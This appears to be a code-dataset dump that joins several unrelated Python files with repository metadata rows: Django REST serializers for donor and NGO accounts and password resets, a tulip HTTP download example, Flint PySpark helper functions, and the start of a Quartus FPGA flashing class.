        )
class DonnerRegisterSerializer(ModelSerializer):
    """Registration serializer for Donner accounts.

    Requires a unique email, two matching password fields, and creates
    the Donner with a properly hashed password.
    """
    email = EmailField(
        required=True, validators=[UniqueValidator(queryset=Donner.objects.all())]
    )
    password = CharField(write_only=True, required=True,
                         validators=[validate_password])
    password2 = CharField(write_only=True, required=True)
    class Meta:
        model = Donner
        fields = (
            "id",
            "type",
            "email",
            "password",
            "password2",
            "first_name",
            "last_name",
            "phone_number",
            "country",
            "state",
            "city",
            "pin",
            "DOB",
            "profile_photo",
        )
        extra_kwargs = {
            "first_name": {"required": True},
            "last_name": {"required": True},
            "password": {"write_only": True},
            "password2": {"write_only": True},
        }
    def validate(self, attrs):
        """Ensure the two password fields match."""
        if attrs["password"] != attrs["password2"]:
            raise ValidationError(
                {"password": "Password fields didn't match."})
        return attrs
    def create(self, validated_data):
        """Create the Donner; the password is hashed via set_password()."""
        user = Donner.objects.create(
            email=validated_data["email"],
            first_name=validated_data["first_name"],
            last_name=validated_data["last_name"],
            type=validated_data["type"],
            country=validated_data["country"],
            phone_number=validated_data["phone_number"],
            state=validated_data["state"],
            city=validated_data["city"],
            pin=validated_data["pin"],
            DOB=validated_data["DOB"],
            profile_photo=validated_data["profile_photo"],
        )
        user.set_password(validated_data["password"])
        user.save()
        return user
class NGORegisterSerializer(ModelSerializer):
    """Registration serializer for NGO accounts.

    Requires a unique email, two matching password fields, and creates
    the NGO with a properly hashed password.
    """
    # BUG FIX: the uniqueness check previously ran against
    # Donner.objects (copy-paste from DonnerRegisterSerializer), so an
    # email already used by another NGO passed validation and only
    # failed at the database level.
    email = EmailField(
        required=True, validators=[UniqueValidator(queryset=NGO.objects.all())]
    )
    password = CharField(write_only=True, required=True,
                         validators=[validate_password])
    password2 = CharField(write_only=True, required=True)

    class Meta:
        model = NGO
        fields = (
            "id",
            "email",
            "password",
            "password2",
            "name",
            "phone_number",
            "type",
            "country",
            "state",
            "city",
            "pin",
            "ngo_approval_cert",
        )
        extra_kwargs = {
            "name": {"required": True},
            "password": {"write_only": True},
            "password2": {"write_only": True},
        }

    def validate(self, attrs):
        """Ensure the two password fields match."""
        if attrs["password"] != attrs["password2"]:
            raise ValidationError(
                {"password": "Password fields didn't match."})
        return attrs

    def create(self, validated_data):
        """Create the NGO; the password is hashed via set_password()."""
        user = NGO.objects.create(
            email=validated_data["email"],
            name=validated_data["name"],
            type=validated_data["type"],
            phone_number=validated_data["phone_number"],
            country=validated_data["country"],
            state=validated_data["state"],
            city=validated_data["city"],
            pin=validated_data["pin"],
            ngo_approval_cert=validated_data["ngo_approval_cert"],
        )
        user.set_password(validated_data["password"])
        user.save()
        return user
class DonnerChangePasswordSerializer(ModelSerializer):
    """Password-change serializer for Donner accounts: verifies the old
    password and sets a new, validated one."""
    password = CharField(
        write_only=True, required=True, validators=[validate_password])
    password2 = CharField(write_only=True, required=True)
    old_password = CharField(write_only=True, required=True)
    class Meta:
        model = Donner
        fields = ('old_password', 'password', 'password2')
    def validate(self, attrs):
        """Ensure the two new-password fields match."""
        if attrs['password'] != attrs['password2']:
            raise ValidationError(
                {"password": "Password fields didn't match."})
        return attrs
    def validate_old_password(self, value):
        """Check the old password against the requesting user."""
        user = self.context['request'].user
        if not user.check_password(value):
            raise ValidationError(
                {"old_password": "Old password is not correct"})
        return value
    def update(self, instance, validated_data):
        """Hash and store the new password on *instance*."""
        instance.set_password(validated_data['password'])
        instance.save()
        return instance
class NGOChangePasswordSerializer(ModelSerializer):
    """Password-change serializer for NGO accounts: verifies the old
    password and sets a new, validated one.

    NOTE(review): identical logic to DonnerChangePasswordSerializer
    except for the model; could be factored into a shared base class.
    """
    password = CharField(
        write_only=True, required=True, validators=[validate_password])
    password2 = CharField(write_only=True, required=True)
    old_password = CharField(write_only=True, required=True)
    class Meta:
        model = NGO
        fields = ('old_password', 'password', 'password2')
    def validate(self, attrs):
        """Ensure the two new-password fields match."""
        if attrs['password'] != attrs['password2']:
            raise ValidationError(
                {"password": "Password fields didn't match."})
        return attrs
    def validate_old_password(self, value):
        """Check the old password against the requesting user."""
        user = self.context['request'].user
        if not user.check_password(value):
            raise ValidationError(
                {"old_password": "Old password is not correct"})
        return value
    def update(self, instance, validated_data):
        """Hash and store the new password on *instance*."""
        instance.set_password(validated_data['password'])
        instance.save()
        return instance
class DonnerUpdateUserSerializer(ModelSerializer):
    """Update serializer for a Donner's editable profile fields."""

    class Meta:
        model = Donner
        fields = (
            "first_name",
            "last_name",
            "phone_number",
            "country",
            "state",
            "city",
            "pin",
            "DOB",
            "profile_photo",
        )

    def validate_email(self, value):
        """Reject an email already used by another Donner.

        NOTE(review): "email" is not in Meta.fields, so this hook is
        currently inert -- confirm whether email should be editable.
        """
        user = self.context['request'].user
        if Donner.objects.exclude(pk=user.pk).filter(email=value).exists():
            raise ValidationError({"email": "This email is already in use."})
        return value

    def update(self, instance, validated_data):
        """Apply the validated fields to *instance* and save it.

        ROBUSTNESS FIX: uses .get() with the current value as default so
        partial updates (PATCH) no longer raise KeyError when a field is
        omitted; full updates behave exactly as before.
        """
        for field in self.Meta.fields:
            setattr(instance, field,
                    validated_data.get(field, getattr(instance, field)))
        instance.save()
        return instance
class NGOUpdateUserSerializer(ModelSerializer):
    """Update serializer for an NGO's editable profile fields."""

    class Meta:
        model = NGO
        fields = (
            "name",
            "phone_number",
            "country",
            "state",
            "city",
            "pin",
            "ngo_approval_cert",
        )

    def validate_email(self, value):
        """Reject an email already used by another NGO.

        NOTE(review): "email" is not in Meta.fields, so this hook is
        currently inert -- confirm whether email should be editable.
        """
        user = self.context['request'].user
        if NGO.objects.exclude(pk=user.pk).filter(email=value).exists():
            raise ValidationError({"email": "This email is already in use."})
        return value

    def update(self, instance, validated_data):
        """Apply the validated fields to *instance* and save it.

        ROBUSTNESS FIX: uses .get() with the current value as default so
        partial updates (PATCH) no longer raise KeyError when a field is
        omitted; full updates behave exactly as before.
        """
        for field in self.Meta.fields:
            setattr(instance, field,
                    validated_data.get(field, getattr(instance, field)))
        instance.save()
        return instance
class EmailResetPasswordSerializer(Serializer):
    """Request-body serializer for initiating a password reset by email."""
    email = EmailField(min_length=5)
    class Meta:
        fields = ['email']
class SetNewPasswordSerializer(Serializer):
    """Validate a password-reset uid/token pair and apply the new password."""
    password = CharField(min_length=6, max_length=100, write_only=True)
    uidb64 = CharField(min_length=1, write_only=True)
    token = CharField(min_length=1, write_only=True)

    class Meta:
        fields = ["password", "uidb64", "token"]

    def validate(self, attrs):
        """Decode the uid, verify the reset token, set the password.

        :raises AuthenticationFailed: when the reset link is invalid
        """
        try:
            password = attrs.get("password")
            uidb64 = attrs.get("uidb64")
            token = attrs.get("token")
            id = force_str(urlsafe_base64_decode(uidb64))
            user = CustomUser.objects.get(id=id)
            if not PasswordResetTokenGenerator().check_token(user, token):
                raise AuthenticationFailed("The reset link is invalid", 401)
            user.set_password(password)
            user.save()
            # BUG FIX: DRF expects validate() to return the validated
            # data; the original returned the user object, which
            # corrupted serializer.validated_data.
            return attrs
        except AuthenticationFailed:
            # propagate our own failure without re-wrapping it
            raise
        except Exception:
            # any decode/lookup error means the link cannot be trusted
            raise AuthenticationFailed("The reset link is invalid", 401)
| 29.811765 | 82 | 0.594909 | 9,515 | 0.938733 | 0 | 0 | 235 | 0.023185 | 0 | 0 | 1,704 | 0.168114 |
2bd5ae744552e1cc86f7a6d91ead98d30783f188 | 453 | py | Python | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | 6 | 2015-01-19T11:14:03.000Z | 2016-02-22T06:16:51.000Z | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | null | null | null | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | null | null | null | import tulip
from tulip import http
@tulip.coroutine
def download(url):
    """Fetch *url*, print the response headers (truncated to 80 chars)
    and the size of the body."""
    response = yield from http.request('GET', url)
    for header, value in response.items():
        print('{}: {}'.format(header, value[:80]))
    body = yield from response.read()
    print('\nReceived {} bytes.\n'.format(len(body)))
if __name__ == '__main__':
    # Drive the coroutine to completion on the tulip event loop.
    loop = tulip.get_event_loop()
    coroutine = download('http://omegafeihong.tumblr.com')
    loop.run_until_complete(coroutine)
| 26.647059 | 58 | 0.660044 | 0 | 0 | 238 | 0.525386 | 255 | 0.562914 | 0 | 0 | 79 | 0.174393 |
2bd67d5e723b9c06ff50baa0fbd6ffdaf7fb05cb | 3,752 | py | Python | python/ts/flint/utils.py | mattomatic/flint | ee1dc08b5a7f2c84e41bfbc7a02e069d23d02c72 | [
"Apache-2.0"
] | 972 | 2016-10-25T20:56:50.000Z | 2022-03-23T06:05:59.000Z | python/ts/flint/utils.py | mattomatic/flint | ee1dc08b5a7f2c84e41bfbc7a02e069d23d02c72 | [
"Apache-2.0"
] | 66 | 2016-11-02T15:27:35.000Z | 2022-02-15T16:48:48.000Z | python/ts/flint/utils.py | jaewanbahk/flint | eda21faace03ed90258d1008071e9ac7033f5f48 | [
"Apache-2.0"
] | 218 | 2016-11-04T11:03:24.000Z | 2022-01-21T21:31:59.000Z | #
# Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_UNIT_TO_JUNIT = {
"s": "SECONDS",
"ms": "MILLISECONDS",
"us": "MICROSECONDS",
"ns": "NANOSECONDS"
}
def jsc(sc):
    """Returns the underlying Scala SparkContext

    :param sc: SparkContext
    :return: :class:`py4j.java_gateway.JavaObject` (org.apache.spark.SparkContext)
    """
    # _jsc is the Java-side JavaSparkContext wrapper; .sc() unwraps it
    # to the Scala SparkContext.
    return sc._jsc.sc()
def jvm(sc):
    """Returns the Pyspark JVM handle

    :param sc: SparkContext
    :return: :class:`py4j.java_gateway.JVMView`
    """
    return sc._jvm
def scala_object(jpkg, obj):
    """Return the singleton instance (``MODULE$``) of the Scala object
    named *obj* inside the py4j package handle *jpkg*."""
    return jpkg.__getattr__(obj + "$").__getattr__("MODULE$")
def scala_package_object(jpkg):
    """Return the Scala package object (``package$.MODULE$``) for *jpkg*."""
    return scala_object(jpkg, "package")
def pyutils(sc):
    """Returns a handle to ``com.twosigma.flint.rdd.PythonUtils``

    :param sc: SparkContext
    :return: :class:`py4j.java_gateway.JavaPackage` (com.twosigma.flint.rdd.PythonUtils)
    """
    return jvm(sc).com.twosigma.flint.rdd.PythonUtils
def copy_jobj(sc, obj):
    """Returns a Java object ``obj`` with an additional reference count

    :param sc: Spark Context
    :param obj: :class:`py4j.java_gateway.JavaObject`
    :return: ``obj`` (:class:`py4j.java_gateway.JavaObject`) with an additional reference count
    """
    # Delegates to the Scala-side helper so the JVM keeps the object alive.
    return pyutils(sc).makeCopy(obj)
def to_list(lst):
    """Wrap *lst* in a list if it is not one already.

    A string or a non-iterable value becomes a single-element list; any
    other iterable is materialized with ``list()``; an existing list is
    returned unchanged.

    :return: a ``list`` object, either lst or lst in a list
    """
    if isinstance(lst, list):
        return lst
    if isinstance(lst, str):
        return [lst]
    try:
        return list(lst)
    except TypeError:
        return [lst]
def list_to_seq(sc, lst, preserve_none=False):
    """Convert a Python value to a ``scala.collection.Seq``.

    ``None`` maps to ``None`` (when *preserve_none*) or an empty Seq; a
    bare object becomes a one-element Seq; a list/tuple keeps its
    elements.

    :return: A copy of ``lst`` as a ``scala.collection.Seq``
    """
    if lst is None:
        if preserve_none:
            return None
        lst = []
    return jvm(sc).org.apache.spark.api.python.PythonUtils.toSeq(to_list(lst))
def py_col_to_scala_col(sc, py_col):
    """Convert a Python list or tuple to a Scala Seq; any other value is
    returned unchanged.

    Dispatch is on the exact type (not isinstance), matching the
    original behavior for subclasses.
    """
    convert = {list: list_to_seq, tuple: list_to_seq}.get(type(py_col))
    return convert(sc, py_col) if convert else py_col
def junit(sc, unit):
    """Converts a Pandas unit to scala.concurrent.duration object

    :return: Scala equivalent of ``unit`` as ``scala.concurrent.duration object``
    """
    if unit not in _UNIT_TO_JUNIT:
        raise ValueError("unit must be in {}".format(_UNIT_TO_JUNIT.keys()))
    duration_pkg = jvm(sc).scala.concurrent.duration
    junit_name = _UNIT_TO_JUNIT[unit]
    return scala_package_object(duration_pkg).__getattr__(junit_name)()
def jschema(sc, schema):
    """Converts a Python schema (StructType) to a Scala schema ``org.apache.spark.sql.types.StructType``

    :return: :class:``org.apache.spark.sql.types.StructType``
    """
    import json
    # NOTE(review): pyspark's StructType.jsonValue is a method; passing
    # it uncalled to json.dumps would not serialize -- confirm whether
    # this should be schema.jsonValue().
    return jvm(sc).org.apache.spark.sql.types.StructType.fromString(json.dumps(schema.jsonValue))
| 30.754098 | 104 | 0.67564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,250 | 0.59968 |
2bd798abddd7a95bff54e0bc290234fe6c7881d3 | 821 | py | Python | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | rosin-project/ros2_fuzz | a01394f530ada966a5f9f72fd3990a6964fb8bff | [
"MIT"
] | 8 | 2020-11-13T11:56:52.000Z | 2021-08-31T09:37:57.000Z | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | JnxF/automatic_fuzzing | e49135335e9d65cee4bf82c6d18a09beb9238000 | [
"MIT"
] | 2 | 2021-06-10T09:50:45.000Z | 2021-09-13T14:39:32.000Z | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | JnxF/automatic_fuzzing | e49135335e9d65cee4bf82c6d18a09beb9238000 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append("..")
from ros2_fuzzer.fuzzing_utils.type_parser import TypeParser
from ros2_fuzzer.fuzzing_utils.fuzzing_descriptor import FuzzTargetProcessor
from ros2_fuzzer.fuzzing_utils.generate_cpp_file import generate_cpp_file
def generate_service_template(source: str, ros_type_str: str, headers_file: str) -> str:
    """Render the C++ fuzzing harness for a ROS 2 service.

    :param source: path to the original service source file
    :param ros_type_str: ROS type in C++ notation, e.g. "pkg::srv::Foo"
    :param headers_file: header file to include in the generated harness
    :return: the generated C++ source as a string
    """
    original_file = os.path.basename(source)
    ros_type = TypeParser.parse_type(ros_type_str.replace("::", "/"))
    fuzz_target = FuzzTargetProcessor().process(
        ros_type,
        headers_file=headers_file,
        original_file=original_file,
        ros_type_str=ros_type_str,
    )
    return generate_cpp_file(
        fuzz_target=fuzz_target,
        source_file=source,
        template_name="service_template.jinx.cpp",
    )
| 29.321429 | 88 | 0.744214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 38 | 0.046285 |
2bd84f2755773c44a8ad81ee8940c817d7f00023 | 1,432 | py | Python | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import argparse
import os
from PIL import Image
densities = {
'mdpi': 48,
'hdpi': 72,
'xhdpi': 96,
'xxhdpi': 144,
'xxxhdpi': 192
}
class PathAction(argparse.Action):
    """argparse action validating that the value is an existing directory.

    A single trailing slash is stripped before the value is stored on
    the namespace; a missing path or a non-directory raises
    ``argparse.ArgumentError``.
    """

    def __call__(self, parser, namespace, value, options_string=None):
        if not os.path.exists(value):
            raise argparse.ArgumentError(
                self, 'Path does not exist: {}'.format(value))
        if not os.path.isdir(value):
            raise argparse.ArgumentError(
                self, 'Path is not a directory: {}'.format(value))
        cleaned = value[:-1] if value.endswith('/') else value
        setattr(namespace, self.dest, cleaned)
def main():
    """Resize the source icon into every Android mipmap density and save
    the result under the res directory."""
    args = _parse_args()
    source = Image.open(args.source)
    for density_name, density_size in densities.items():
        destination = _create_output_file(args.res_dir, density_name, args.filename)
        print('Writing: {}'.format(destination))
        resized = source.resize((density_size, density_size), Image.LANCZOS)
        resized.save(destination, 'PNG')
        resized.close()
    print('...done!')
def _parse_args():
    """Parse CLI arguments: the source image file, the output file name,
    and an existing Android res directory (validated by PathAction)."""
    parser = argparse.ArgumentParser()
    parser.add_argument('source', type=argparse.FileType('r'))
    parser.add_argument('filename')
    parser.add_argument('res_dir', action=PathAction)
    return parser.parse_args()
def _create_output_file(res_dir, density, filename):
path = '{}/mipmap-{}'.format(res_dir, density)
if not os.path.exists(path):
os.makedirs(path)
return '{}/{}'.format(path, filename)
if __name__ == '__main__':
main()
| 26.036364 | 82 | 0.713687 | 414 | 0.289106 | 0 | 0 | 0 | 0 | 0 | 0 | 203 | 0.14176 |
2bd852a26654310e3a3bb617e66a4db19ed7396d | 3,814 | py | Python | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 7 | 2015-03-30T14:15:35.000Z | 2021-12-22T06:48:22.000Z | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 16 | 2015-06-01T13:48:01.000Z | 2022-02-08T15:03:32.000Z | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 15 | 2015-03-02T08:57:35.000Z | 2022-03-01T09:48:45.000Z | import re
try:
long
except NameError:
long = int
# list of prod source label for pilot tests
list_ptest_prod_sources = ['ptest', 'rc_test', 'rc_test2', 'rc_alrb']
# mapping with prodsourcelabels that belong to analysis and production
analy_sources = ['user', 'panda']
prod_sources = ['managed', 'prod_test']
neutral_sources = ['install'] + list_ptest_prod_sources
ANALY_PS = 'user'
PROD_PS = 'managed'
ANALY_TASKTYPE = 'anal'
PROD_TASKTYPE = 'prod'
job_labels = [ANALY_PS, PROD_PS]
# priority of tasks to jumbo over others
priorityTasksToJumpOver = 1500
def translate_resourcetype_to_cores(resource_type, cores_queue):
    """Return the core count implied by *resource_type*.

    Multi-core ("MCORE...") resource types use the queue's core count;
    single-core types always map to 1.
    """
    return cores_queue if 'MCORE' in resource_type else 1
def translate_prodsourcelabel_to_jobtype(queue_type, prodsourcelabel):
    """Map a prodsourcelabel to a job type.

    Neutral labels (install/pilot tests) are resolved through the queue
    type; anything unmapped is passed through unchanged.
    """
    if prodsourcelabel in analy_sources:
        return ANALY_PS
    if prodsourcelabel in prod_sources:
        return PROD_PS
    if prodsourcelabel in neutral_sources:
        if queue_type in ('unified', 'production'):
            return PROD_PS
        if queue_type == 'analysis':
            return ANALY_PS
    # currently unmapped
    return prodsourcelabel
def translate_tasktype_to_jobtype(task_type):
    """Map a task type to a job type; any unrecognized task type is
    defaulted to production."""
    return ANALY_PS if task_type == ANALY_TASKTYPE else PROD_PS
# get core count
def getCoreCount(actualCoreCount, defCoreCount, jobMetrics):
    """Resolve the number of cores used by a job.

    Precedence: the measured *actualCoreCount* if known, otherwise a
    ``coreCount=N`` token embedded in *jobMetrics*, otherwise the job
    definition's *defCoreCount* (when neither None nor 0), defaulting
    to 1.

    :param actualCoreCount: measured core count, or None if unknown
    :param defCoreCount: core count from the job definition (may be None/0)
    :param jobMetrics: metrics string possibly containing "coreCount=N"
    :return: resolved core count
    """
    coreCount = 1
    try:
        if actualCoreCount is not None:
            coreCount = actualCoreCount
        else:
            tmpMatch = None
            if jobMetrics is not None:
                # extract coreCount; raw string fixes the '\d' escape
                tmpMatch = re.search(r'coreCount=(\d+)', jobMetrics)
            if tmpMatch is not None:
                # int() replaces the Python-2 'long' shim; identical here
                coreCount = int(tmpMatch.group(1))
            else:
                # use jobdef value when it is meaningful
                if defCoreCount not in [None, 0]:
                    coreCount = defCoreCount
    except Exception:
        # best effort: any parsing problem falls back to the default
        pass
    return coreCount
# get HS06sec
def getHS06sec(startTime, endTime, corePower, coreCount, baseWalltime=0, cpuEfficiency=100):
    """Compute the HS06-seconds consumed over a job's execution interval.

    Returns 0 when *cpuEfficiency* is 0 or the walltime does not exceed
    *baseWalltime*, and None when the inputs cannot be processed.
    """
    try:
        # scaling disabled
        if cpuEfficiency == 0:
            return 0
        delta = endTime - startTime
        walltime = delta.days * 24 * 3600 + delta.seconds
        if walltime <= baseWalltime:
            return 0
        return float(walltime - baseWalltime) * corePower * coreCount \
            * float(cpuEfficiency) / 100.0
    except Exception:
        return None
# parse string for number of standby jobs
def parseNumStandby(catchall):
    """Parse the first ``nStandby=`` entry of a catchall string.

    Expected format: ``nStandby=<sw_id>:<resource_type>:<num>|...``
    where an empty <num> means 0 and sw_id is converted to int when
    possible.  Only the first comma-separated nStandby entry is
    honored.  Returns {sw_id: {resource_type: num}}.
    """
    retMap = {}
    if catchall is None:
        return retMap
    for item in catchall.split(','):
        match = re.search('^nStandby=(.+)', item)
        if match is None:
            continue
        for chunk in match.group(1).split('|'):
            parts = chunk.split(':')
            if len(parts) != 3:
                continue
            sw_id, resource_type, num = parts
            try:
                sw_id = int(sw_id)
            except Exception:
                pass
            retMap.setdefault(sw_id, {})[resource_type] = \
                0 if num == '' else int(num)
        break  # only the first nStandby entry is processed
    return retMap
# compensate memory count to prevent jobs with ramCount close to the HIMEM border from going to HIMEM PQs
def compensate_ram_count(ram_count):
    """Scale ramCount down by 10% so borderline jobs stay off HIMEM queues.

    'NULL' and None both map to None.
    """
    if ram_count == 'NULL' or ram_count is None:
        return None
    return int(ram_count * 0.90)
| 28.462687 | 105 | 0.607499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.184059 |
2bdae61f57803109d14c71c62a57ac97f4c10c5b | 724 | py | Python | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | try:
from IPython import get_ipython
if get_ipython().__class__.__name__ not in ['NoneType']:
from IPython import display
i_am_in_interatcive = True
import pylab as pl
pl.rcParams['figure.figsize'] = [13, 13]
# print("INTERACTIVE")
else:
import matplotlib.pyplot as pl
i_am_in_interatcive = False
# print("NOT INTERACTIVE")
except:
import matplotlib.pyplot as pl
i_am_in_interatcive = False
# print("__INIT__ EXECUTED")
from .Agent import Agent
from .Enviroment_with_agents import Enviroment_with_agents
from .Enviroment import Enviroment
from .InOut_Simple_Laberinth import InOut_Simple_Laberinth, No_Walls_Laberinth
import numpy as np
| 28.96 | 78 | 0.718232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.140884 |
2bdb72de3864824147a567ff656f6b865054a2e0 | 1,543 | py | Python | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 9 | 2017-10-16T17:04:48.000Z | 2021-11-03T13:09:11.000Z | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 60 | 2017-05-22T15:43:06.000Z | 2022-02-07T22:16:48.000Z | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 9 | 2017-11-27T16:19:11.000Z | 2021-01-24T03:48:08.000Z | '''
Constants
---
Constants used in other scripts. These are mostly interpretations of fields
provided in the Face2Gene jsons.
'''
HGVS_ERRORDICT_VERSION = 0
# Bucket name, from where Face2Gene vcf and json files will be downloaded
AWS_BUCKET_NAME = "fdna-pedia-dump"
# caching directory
CACHE_DIR = ".cache"
# tests that count as chromosomal tests, if these are positive, cases will be
# excluded
CHROMOSOMAL_TESTS = [
'CHROMOSOMAL_MICROARRAY',
'FISH',
'KARYOTYPE'
]
# Test result descriptions, that will be counted as positive for our case
# selection criteria
POSITIVE_RESULTS = [
'ABNORMAL',
'ABNORMAL_DIAGNOSTIC',
'DELETION_DUPLICATION',
'VARIANTS_DETECTED'
]
# Test result descriptions counted as negative for case selection.
# BUG FIX: the original list had no commas, so implicit string
# concatenation collapsed all four entries into one bogus string and
# membership tests (e.g. 'NORMAL' in NEGATIVE_RESULTS) never matched.
NEGATIVE_RESULTS = [
    'NORMAL',
    'NORMAL_FEMALE',
    'NORMAL_MALE',
    'NO_SIGNIFICANT_VARIANTS',
]
# Translation of Face2Gene Mutation notation to HGVS operators
HGVS_OPS = {
'SUBSTITUTION': '>',
'DELETION': 'del',
'DUPLICATION': 'dup',
'INSERTION': 'ins',
'INVERSION': 'inv',
'DELETION_INSERTION': 'delins',
'UNKNOWN': ''
}
# Translation of Description levels in Face2Gene to HGVS sequence types
HGVS_PREFIX = {
'CDNA_LEVEL': 'c',
'PROTEIN_LEVEL': 'p',
'GENOMIC_DNA_LEVEL': 'g',
'UNKNOWN': '',
'RS_NUMBER': ''
}
# blacklist HPO illegal hpo terms
ILLEGAL_HPO = [
'HP:0000006' # autosomal-dominant inheritance
]
CONFIRMED_DIAGNOSIS = [
"MOLECULARLY_DIAGNOSED",
"CLINICALLY_DIAGNOSED",
"CORRECTED_DIAGNOSIS"
]
DIFFERENTIAL_DIAGNOSIS = [
"DIFFERENTIAL_DIAGNOSIS",
]
| 20.302632 | 77 | 0.69151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,101 | 0.713545 |
2bdb8dac398701774f4f849fe5868b3aef79e3a7 | 806 | py | Python | jetson_nano/serial_monitor.py | hixio-mh/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 32 | 2019-12-02T08:26:31.000Z | 2022-01-13T06:56:19.000Z | jetson_nano/serial_monitor.py | resslerruntime/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 15 | 2020-01-28T22:17:38.000Z | 2022-03-12T00:02:01.000Z | jetson_nano/serial_monitor.py | resslerruntime/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 17 | 2019-11-26T14:46:05.000Z | 2021-07-05T12:46:58.000Z | #!/usr/bin/python3
import serial # http://pyserial.sf.net
import time
from datetime import datetime
import struct
# Send a SET_TIME command ('X' followed by a big-endian 32-bit Unix
# timestamp) to an Arduino over USB serial, then echo whatever the
# Arduino prints back, forever.
port = '/dev/ttyACM0' # note I'm using Jetson Nano
arduino = serial.Serial(port, 9600, timeout=5)
time.sleep(2) # wait for Arduino
arduino.flush()
command = 'X' # SET TIME
encoded_command = command.encode();
arduino.write(encoded_command)
arduino.flush()
time.sleep(1)
now = datetime.now()
# current Unix time, truncated to whole seconds
timestamp = int(datetime.timestamp(now))
# '>L' packs the timestamp as an unsigned 32-bit big-endian integer
commdata = arduino.write(struct.pack('>L', timestamp))
arduino.flush()
time.sleep(1)
print("SET_TIME offset sent: ")
print(str(timestamp))
# echo loop: print every non-empty line the Arduino sends back
while True:
    time.sleep(1) # wait for Arduino
    arduino.flush()
    msg = arduino.read(arduino.inWaiting()) # read all characters in buffer
    text = msg.decode().strip()
    if text != '':
        print(text)
| 23.028571 | 75 | 0.705955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.240695 |
2bdb91041eec35c1c58197d76e4a723d39aceee0 | 18,798 | py | Python | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | 1 | 2018-08-31T06:48:14.000Z | 2018-08-31T06:48:14.000Z | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | null | null | null | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/python3
#
# Copyright (c) 2021 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
import copy
import os
import subprocess
import commonl
import ttbl
import ttbl.images
import ttbl.power
class pgm_c(ttbl.images.flash_shell_cmd_c):
    """Flash using Intel's Quartus PGM tool
    This allows to flash images to an Altera MAX10, using the Quartus
    tools, freely downloadable from
    https://www.intel.com/content/www/us/en/collections/products/fpga/software/downloads.html?s=Newest
    Exports the following interfaces:
    - power control (using any AC power switch, such as the
      :class:`Digital Web Power Switch 7 <ttbl.pc.dlwps7>`)
    - serial console
    - image (in hex format) flashing (using the Quartus Prime tools
      package)
    Multiple instances at the same time are supported; however, due to
    the JTAG interface not exporting a serial number, addressing has
    to be done by USB path, which is risky (as it will change when the
    cable is plugged to another port or might be enumerated in a
    different number).
    :param str usb_serial_number: USB serial number of the USB device to use
      (USB-BlasterII or similar)
    :param dict image_map: maps image type names to the target index
      (@NUMBER) in the JTAG chain
    :param str name: (optiona; default 'Intel Quartus PGM #<DEVICEID>')
      instrument's name.
    :param dict args: (optional) dictionary of extra command line options to
      *quartus_pgm*; these are expanded with the target keywords with
      *%(FIELD)s* templates, with fields being the target's
      :ref:`metadata <finding_testcase_metadata>`:
      FIXME: move to common flash_shell_cmd_c
